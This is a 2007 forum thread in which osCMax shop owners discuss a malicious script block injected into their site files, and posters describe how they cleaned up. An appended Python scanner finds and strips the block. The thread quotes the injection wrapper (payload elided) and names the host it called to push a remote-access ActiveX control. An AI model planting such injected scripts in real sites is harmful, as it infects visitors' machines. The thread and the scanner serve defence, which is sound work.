This is a discussion on Security Issue within the osCMax v2 Installation issues forums, part of the osCMax v2.0 Forums category.
#1
Hi all. Really need help. In my webshops this code has suddenly appeared in every file?

<!--[z0s]--><script>document.write(unescape("…"))</script><!--[/z0s]-->

Last edited by automotiveuk; 09-09-2007 at 04:50 AM. Reason: display error
#2
Time to restore from backup or manually remove that code from your site. I also suggest you start searching through the server for clues as to how this happened. File edits, ftp, accesses should all be logged somewhere on the server. You need to find out how all your files were edited.
__________________ Michael Sasek osCMax Developer
#3
Hi, cheers for the reply.

Locked down the servers yesterday, changed all user and root passwords, and removed all JavaScript code from files. It seems the code was only in top-level files, i.e. index.php etc.; did not find any code in sub files, i.e. in includes for templated files and dir. Have checked and looked in the root .bash file history and cannot find anything strange. I can say it must be very clever: I have one very expensive strong firewall gateway and each server has iptables as well. The only thing I can think of is someone must have used a packet sniffer to grab passwords.

Just for my info, is it possible to write top-level files if I have registered globals switched on?

For the future, and a bit more info: I understand from searching on Sunday that Dreamhost was hacked as well. The encrypted JavaScript code was opening a browser link to this URL update1.classictel.org and trying to install and run remote data access ActiveX in Internet Explorer.

All the best, Darren
#4
FYI..... We had this same code; it is a virus that makes the user install an ActiveX. This code was also found in other files in the Root Dir. You should look at the other files in the root and change all the permissions to read only; this will make it so they can't do it again.

Adam
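The manual cleanup and log search suggested in posts #2 and #4, as an added example that is not part of the thread: a scanner that finds the `<!--[z0s]-->` … `<!--[/z0s]-->` block quoted in post #1, records each file's modification time for matching against FTP and access logs, and strips the block after saving an evidence copy outside the web root. The names `scan`, `demo` and `quarantine` are hypothetical, and the sample tree is constructed.

```python
import os
import re
import shutil
import tempfile

OPEN, CLOSE = b"<!--[z0s]-->", b"<!--[/z0s]-->"   # markers quoted in post #1
BLOCK = re.compile(re.escape(OPEN) + b".*?" + re.escape(CLOSE), re.DOTALL)

def scan(webroot, quarantine=None):
    """Return (path, mtime, status) per marked file; clean only if quarantine is set."""
    hits = []
    for dirpath, _dirs, names in os.walk(webroot):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            if OPEN not in data and CLOSE not in data:
                continue
            mtime = os.stat(path).st_mtime   # edit time, to match against FTP/access logs
            cleaned, _ = BLOCK.subn(b"", data)
            if OPEN in cleaned or CLOSE in cleaned:
                status = "manual-review"     # unpaired marker: do not guess where it ends
            elif quarantine is None:
                status = "infected"          # report-only run, file left untouched
            else:
                os.makedirs(quarantine, exist_ok=True)
                rel = os.path.relpath(path, webroot).replace(os.sep, "__")
                shutil.copy2(path, os.path.join(quarantine, rel))   # evidence copy
                with open(path, "wb") as fh:
                    fh.write(cleaned)
                status = "cleaned"
            hits.append((path, mtime, status))
    return sorted(hits, key=lambda h: h[1])  # oldest modification first

def demo():
    """Constructed tree: one injected file, one clean file, one with a broken marker."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "includes"))
    samples = {
        "index.php": b"<?php echo 'shop'; ?>\n" + OPEN + b"<script>/* placeholder */</script>" + CLOSE + b"\n",
        "includes/header.php": b"<?php // untouched ?>\n",
        "broken.php": b"<?php ?>\n" + OPEN + b"<script>truncated",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    return scan(root, quarantine=root + "-quarantine")
```

Running `scan` without `quarantine` first gives a report-only pass; the quarantine directory should sit outside the web root so the saved copies are never served.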